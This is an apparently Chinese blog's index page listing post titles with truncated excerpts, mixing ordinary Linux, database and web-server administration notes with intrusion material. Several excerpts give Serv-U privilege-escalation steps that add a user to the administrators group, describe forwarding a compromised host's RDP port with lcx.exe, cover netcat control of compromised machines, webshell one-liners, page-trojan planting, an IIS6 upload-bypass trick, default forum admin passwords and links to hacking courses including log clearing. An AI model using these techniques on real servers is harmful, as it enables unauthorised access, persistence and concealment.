- 博客(50)
- 资源 (4)
- 收藏
- 关注
RSS订阅原创 Windows进程守护工具
近期,中心应用服务无故关闭。在检查系统和应用程序日志无果后采取了进程守护的方法。测试期内,脚本未出现系统资源占用过多的情况。使用说明:1、进程守护.vbs 使用时需修改运行周期(10行)、守护进程名称(12行)和程序启动路径(22行)。2、进程守护批处理.bat 使用时需修改守护进程名称和执行用户(3行)、程序启动路径(6行)vbs脚本运行时会创建wscript.exe进
2012-07-18 17:14:25
1488
原创 linux网卡流量检测工具
文件说明:streak.sh:以“K”为流量单位的Linux网卡检测工具。stream.sh:以“M”为流量单位的Linux网卡检测工具。使用方法:chmod a+x streak.sh stream.sh./streak.sh或./stream.sh工具说明:此工具截取了Linux系统文件夹/proc/net/dev中的网卡部分信息并按格式打印。打印结果与下一次取
2012-07-18 17:11:09
697
原创 linux下设置自动备份Oracle数据库&异地存储
1、设置时间环境变量oracle用户下 vi .bash_profile //date赋值 export DATE=$(date +%Y%m%d) root用户下 vi .bash_profile export DATE=$(date +%Y%m%d)设置完成后确认是否更改成功。2、编辑
2012-07-18 17:07:59
821
原创 网站访问日志扩展记录配置
IIS服务器在Internet信息服务(IIS)管理器界面。点击“属性”项(如下图所示),进入日志记录属性配置页面。配置“高级”选项。除了默认选项外还应该选择上“Cookie和引用站点”选项。也可将所有选项均选择。 Apache服务器配置httpd.conf在此认为apache服务器安装在/usr/local/目录下;修改apache日志配置文件httpd.conf如下所示
2012-07-18 17:05:30
411
原创 Linux升级配置OpenSSH完全手册
注:此手册在RedHat AS3 Update8和RedHat AS4 Update7上测试成功。一、 升级zLib至1.2.3版本1、 下载Zlib 1.2.3a) wget http://work.mven.cn/Soft/zlib-1.2.3.tar.gz2、 安装Zlib 1.2.3a) tar –zxvf zlib-1.2.3.tar.gzb)
2012-07-18 17:02:54
535
原创 Linux日志分析常用命令汇总
1、查看当天有多少个IP访问:awk '{print $1}' log_file|sort|uniq|wc –l 2、查看某一个页面被访问的次数:grep "/index.php" log_file | wc –l 3、查看每一个IP访问了多少个页面:awk '{++S[$1]} END {for (a in S) print a,S[a]}' log_file
2012-07-18 17:01:38
978
原创 Apache恶意域名绑定的解决办法
近日接触了一款建站集成软件包XAMPP(Apache+MySQL+PHP+PERL)。这个软件包原来的名字是LAMPP,但是为了避免误解,最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris三种操作系统下安装使用,支持多语言:英文、简体中文、繁体中文、韩文、俄文、日文等。我所试验的环境是RedHat5,安装过程很简单,首先解压软件包。一般我喜欢放在/o
2012-07-18 16:56:57
1781
原创 yum服务器安装和客户端配置(Redhat5)
近期使用Linux系统较多,在进行软件的安装部署时,经常提示无法找到依赖包,很是麻烦,因此一直想找到一种方式解决此问题。用过yum软件包管理器的人都知道,Yum(全称为 Yellow dog Updater, Modified)是一个在Fedora和RedHat以及SUSE、CentOS中的Shell前端软件包管理器。基于RPM包管理,能够从指定的服务器自动下载RPM包并且安装,可以自动处理依
2012-07-18 16:52:35
834
原创 Linux Redhat 5 服务优化
Linux安装完成后,根据其用处,关闭不需要的服务。以下为整理过的服务,仅供参考。#!/bin/shchkconfig NetworkManager offchkconfig NetworkManagerDispatcher offchkconfig acpid offchkconfig anacron offchkconfig atd offchkconfig als
2012-07-18 16:43:32
1490
原创 grep、sed、awk、perl对正则表达式的支持的差别
grep、sed、awk、perl对正则表达式的支持有何差别?在各种常用的工具中,正则表达式如此的相似却又不同。下表列出了一些常用的正则表达式,以及其不同之处。项目总多,遗漏必有不少,请各位看官不吝指出。以perl的正则为基准,不同的用法以粉红色标出。grep 2.5.1egrep 2.5.1sed 3.02sed 4.0
2012-07-18 16:30:55
641
原创 windows中目录的变量
%SystemDrive% 操作系统所在的分区号。如 C:%SystemRoot% 操作系统根目录。如 C:\WINDOWS%windir% 操作系统根目录。如 C:\WINDOWS%ALLUSER
2011-08-22 21:11:56
508
原创 serv_u提权记录
一.serv-u ftp本地溢出权限提升(使用6.0以及以前版本)0.用Serv-U提权综合工具生成提权工具serv_u.exe1.先上传 serv_u.exe 到一个盘符下 比如是d盘2.执行命令 d:serv_u.exe3.d:serv_u.exe “net user username password /add” (注意命令要有引号)4.d:serv_u.exe“net localgroup administrators username /add” (注意命令要有引号)
2010-06-29 15:12:00
532
原创 2010全套入侵渗透网站,论坛,超级详细的VIP精选高级语音视频教程
<br />http://www.vdisk.cn/down/index/3952392A4435/系统日志分析和清除.rar.html<br />系统日志分析和清除.rar<br /><br />http://www.vdisk.cn/down/index/3952382A7104/实战突破上传拿下目标站点.rar.html<br />实战突破上传拿下目标站点.rar<br /><br />http://www.vdisk.cn/down/index/3952379A3483/实战FCKeditor漏洞拿
2010-06-24 13:48:00
2998
原创 MySql数据库复制、双向复制
<br />该功能可以实现两个数据库同步,主从模式,互相备份模式的功能。<br />数据库同步复制功能的设置都在mysql的设置文件中体现。mysql的配置文件(windows下为my.ini,Unix/Linux下为my.cnf)<br /> <br />1、实施环境:<br /> 操作系统:2台linux AS 4[up3]<br /> mysql:mysql-4.1.15.tar.gz<br /> SvrA ip:192.168.1.10<br /> SvrB ip:192.168.1.11<
2010-06-04 16:32:00
313
原创 mysql cluster双机集群
一、介绍如何安装配置基于2台服务器的MySQL集群。并且实现任意一台服务器出现问题或宕机时MySql集群依然能够继续运行。加下后续的(keepalived+lvs+mysql cluster文档),可以实现Mysql双机的高可用及负载均衡。安装环境及软件包:vmware workstation 5.5.3mysql-5.2.3-falcon-alpha.tar.gzgentoo 2006.1Server1: 192.168.1.111Server2: 192.168.1.110二、在Server1和Se
2010-06-02 15:02:00
360
原创 haproxy安装配置
# mv haproxy-1.3.15.5 /usr/local/haproxy# cd /usr/local/haproxy/# make TARGET=linux26[root@test haproxy]# pwd/usr/local/haproxy# groupadd haproxy# useradd haproxy -g haproxy通过/etc/passwd查看haproxy得uid和gid分别为504/506# chmod u+x
2010-06-01 23:38:00
3031
1
原创 Squid 2.6反向代理配置手册
<br />squid2.6下载<br />ftp://ftp.rdsct.ro/pub/Linux/Squid/squid-2.6.STABLE4.tar.gz<br /> <br />Squid系一个Linux专有超级反向代理正向代理+Web缓存软件.<br />好多大网站例如 163 shou 新浪….都会想全国各个服务器节点置立尼一个机制。<br />例如,北京用户访问163. 首先会通过DNS轮询找到最近既服务器.然后读取内容。<br />而这一部服务器上的内容,会定时自动由广州既总服务器复制.就
2010-06-01 23:11:00
914
原创 mysql错误提示及资料总结
mysqladmin: connect to server at localhost failederror: Cant connect to local MySQL server through socket /var/lib/mysql/mysql.sock (2)Check that mysqld is running and that the socket: /var/li
2010-05-31 10:46:00
610
原创 lighttpd + mysql + php(fast-cgi)安装与配置
准备:lighttpd-1.4.15.tar.gzphp-4.4.2.tar.gzmysql-5.0.20a.tar.gz开始:1 编译安装lighttpd # tar zxvf lighttpd-1.4.15.tar.gz # cd lighttpd-1.4.15 # ls # ./configure --prefix=/usr/local/lighttpd //此部无法编译时提示安装
2010-05-30 23:16:00
418
原创 三大WEB服务器对比分析(apache ,lighttpd,nginx)
1. lighttpdLighttpd是一个具有非常低的内存开销,cpu占用率低,效能好,以及丰富的模块等特点。lighttpd是众多OpenSource轻量级的web server中较为优秀的一个。支持FastCGI, CGI, Auth, 输出压缩(output compress), URL重写, Alias等重要功能。Lighttpd使用fastcgi方式运行php,它会使用很少的P
2010-05-30 20:59:00
247
原创 nginx网站负载均衡测试
如果你关注过nginx,必定知道nginx这个软件有什么用的,如果你的网站访问量越来越高,一台服务器已经没有办法承受流量压力,那就增多几台服务器来做负载吧。做网站负载可以买硬件设备来实现,比如F5,不过价格就几十万到上百万,够贵,本文介绍做网站负载的软件是免费的,nginx目前好多门户网站与大访问量的网站都在使用做为HTTP服务器,所以nginx是非常优秀的,下面介绍做负载测试吧。 环境:
2010-05-28 22:07:00
567
原创 nginx 多个虚拟主机出现 no input file specified 的解决办法
今天配置nginx rewrite 的时候遇到一个问题,就是访问服务器的是时候提示 No input file specified.访问PHP,访问php就没有事,可以正常访问。猜想可能是php-cgi的问题吧,google 了一下,果然问题出现在这里。网上提供的解决方法:1、 php.ini(/usr/local/php/etc/php.ini)的配置中这两项cgi.fix_path
2010-05-28 09:48:00
765
原创 DNS-BIND安装与配置的关键技术
一.、Bind 简介。Bind是一款开放源码的DNS服务器软件,Bind由美国加州大学Berkeley分校开发和维护的,全名为Berkeley Internet Name Domain它是目前世界上使用最为广泛的DNS服务器软件,支持各种unix平台和windows平台。本文将介绍它在Red hat Linux 9中最基本的安装和配置。二.、软件的相关资源。官方网站:http://www.bind
2010-05-27 20:25:00
241
原创 Apache+Mysql+Php安装文档(rpm版本)
1.mysql 在如下页面下载mysql的for linux rpm包 http://www.mysql.com/downloads/down...3.52-1.i386.rpm ; http://www.mysql.com/downloads/down...3.52-1.i386.rpm ; 存至/home/tmp目录 命令列表: cd /home/tmp
2010-05-27 13:05:00
243
原创 快速安装lamp脚本lamp.sh
不要直接执行,先看一下,改下环境变量!#!/bin/shecho "go... "INST_PATH=`pwd`HOSTNAME=`hostname`installPath_Mysql="/data/mysql"installPath_Apache="/data/apache"installPath_Resin="/data/resin"echo "instpath="$INST_
2010-05-27 13:03:00
712
1
原创 Linux+Apache+Mysql+Php详细安装文档
所需软件源代码包:httpd-2.2.4.tar.gz mysql-5.0.27.tar.gz php-5.2.1.tar.bz2freetype-2.3.2.tar.gz gd-2.0.34.tar.gz jpegsrc.v6b.tar.gzlibpng-1.2.8.tar.bz2 libxml2-2.6.24.tar.bz2 zlib-1.2.2.tar.gz安装顺序:a
2010-05-27 12:41:00
316
原创 一句话网页木马汇总
ASP一句话1. 2. 3. 免杀大部分网站的一句话4.免杀部分网站过略的一句话5.execute request("YouPass")免杀部分网站过略双引号的一句话6.php一句话 7.aspx一句话8. WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("
2010-05-26 22:35:00
492
原创 mysql简单提权
S- serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的 pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不
2010-05-23 13:02:00
932
原创 iptables简单配置
开始配置我们来配置一个filter表的防火墙.(1)查看本机关于IPTABLES的设置情况[root@tp ~]# iptables -L -nChain INPUT (policy ACCEPT)target prot opt source destination Chain FORWARD (policy ACCEPT)target prot opt source
2010-05-10 15:48:00
276
原创 lcx.exe的用法
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389. 用法:如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。 首先在自己机子的cm
2010-05-10 10:28:00
961
原创 nc.exe高级技巧应用汇总
文章结构0. 写在前面的话1. Netcat 1.10 for NT - nc11nt.zip,原始英文信息2. Netcat 1.10 for NT 帮助信息3. Netcat 1.10 常用的命令格式4. 管理肉鸡,更改肉鸡设置5. 下载连接6. 后记 ###################################################################
2010-05-10 10:26:00
353
原创 CMD启动服务命令
cmd下可有两种方法打开服务,net和sc,net用于打开没有被禁用的服务,语法是: net start 服务名,例如:net start TermServicenet stop 服务名,例如:net stop TermService用sc可打开被禁用的服务,语法是:sc config 服务名 start= demand //手动 sc condig 服务名 start= auto
2010-05-10 10:25:00
3137
原创 提权十五课(转载)
第一课 提权概述测试环境:Windows xp 系统1 了解什么是提权?通常是 匿名权限(ASP) ASP.NET USER权限入侵获得webshell并不完美,完美的是获得服务器的权限。第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 123 123 IP也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application
2010-05-10 10:24:00
1824
原创 serv-u提权命令
C:/Documents and Settings/Administrator>ftp www.xxx.comConnected to www.xxx.com.220 Serv-U FTP Server v6.0 for WinSock ready...User (www.fjkohler.com:(none)): bluerainlife331 User name okay, need pass
2010-05-10 10:23:00
593
原创 各种提权总结
需要知道的一些小常识:serv-u自带后门 关键文件 servuadmin.exe或servuadmin.iniserv -u 后门 端口 65500 go od serv-u 6.1open IP 65500一些权限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制system32/boot.dat 里面记录3389登录解决终端mstsc /console /v:
2010-05-10 10:23:00
1461
原创 文件夹CMD快捷方式
打开“我的电脑”,点击菜单中的“工具”-“文件夹选项”,选择“文件类型”,找到“(无)资料夹”,点“高级”,“新建”,在“操作”中填入 “CMD快速通道”(其实爱填什么都可以),“用于执行操作的应用程序”中填入“cmd.exe /k cd %1”(这个是关键),确定即可。右键打开任何一个文件夹、分区,点击“CMD快速通道”,就可以打开CMD命令行了。
2010-05-10 10:22:00
562
原创 网站默认数据库地址,后台和密码
动网:默认数据库/data/dvbbs7.mdb备份数据库/databackup/dvbbs7.mdb前台:用户名:admin密 码:admin888后台:用户名:admin密 码:admin888---------------bbsxp:默认数据库database/bbsxp.mdb_______________LeadBBS默认数据库Data/LeadBBS.mdb用户名: Admin密 码:
2010-05-10 10:22:00
4769
原创 iis6漏洞利用(x.asp;y.jpg篇)
iis6下的一个解析漏洞1.asp;2.jpg或1.asp;jpg上传1.asp;2.jpg,出现Invalid file.无法上传加gif89a绕过验证,结果也不行。又后想到用一句话木马,保存为1.asp;2.jpg上传。成功上传得到路径/userfiles/image/1_asp;2.jpg发现1.asp又被替换成1_asp了。把1.asp;2.jpg改为1.asp;j
2010-05-10 10:21:00
1155
原创 流行网页木马挂马代码
1、嵌入网页 以下是引用片段: 2、PHP网页挂马 以下是引用片段: 3、图片木马 以下是引用片段: 4、邮件木马 以下是引用片段: 5、flash木马 http://网页木马地址 插入木马地址 width=10 height=10", "GET" 宽度和高度,方式 后面的照添,更改木马地址就可以了。 6、做123.JS文件木马 以下是引用片段: document.wri
2010-05-10 10:21:00
374
原创 谷歌搜索引擎语法大全
index of mpeg4 3. index of mp3 4. index of rmvb 5. index of rm 7. index of movie 8. index of swf 9. index of jpg 10. index of admin 12. index of pdf 13. index of doc 14. index of wmv 15. index of mdb
2010-05-10 10:20:00
494
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人